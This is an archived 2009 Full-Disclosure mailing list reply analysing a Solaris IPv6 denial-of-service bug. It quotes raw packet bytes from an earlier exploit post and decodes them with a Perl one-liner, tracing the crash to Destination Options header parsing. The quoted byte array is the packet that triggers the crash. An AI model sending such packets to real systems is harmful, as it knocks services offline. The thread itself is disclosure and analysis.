lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Fri, 30 Jan 2009 14:49:16 +0100
From: GomoR <fd@...or.org>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Solaris IPv6 DoS vulnerabilities
	(was:	Solaris Devs Are Smoking Pot)

On Mon, Jan 26, 2009 at 08:23:45AM +0100, Kingcope Kingcope wrote:
[..]
> unsigned char rawData[] =
> "\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58"
> "\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00"
> "\x02\x0c\x29\xff\xfe\xf1\x1e\xbb";
[..]

% perl -MNet::Frame::Simple -e 'print Net::Frame::Simple->new(raw => "\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0c\x29\xff\xfe\xf1\x1e\xbb",firstLayer => 'IPv6')->print."\n"'
Unable to unpack next layer, not yet implemented in layer: 0:IPv6
IPv6: version:6  trafficClass:0x0f  flowLabel:0xc5729  nextHeader:0x3c
IPv6: payloadLength:0  hopLimit:86
IPv6: src:6f35:4072:702f:5258:cc95:1279:30bb:be25  dst:fe80::20c:29ff:fef1:1ebb

So this vulnerability is due to an implementation flaw in the 
parsing of IPv6 Destination Header (0x3c). Of course, there is 
no IPv6 DH to parse :)

This vulnerability only exists when setting next header to 0x3c 
or does it work with other values ?

My guess is that we have a more general issue here.

-- 
  ^  ___  ___             http://www.GomoR.org/          <-+
  | / __ |__/               Research Engineer              |
  | \__/ |  \     ---[ zsh$ alias psed='perl -pe ' ]---    |
  +-->  Net::Frame <=> http://search.cpan.org/~gomor/  <---+

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ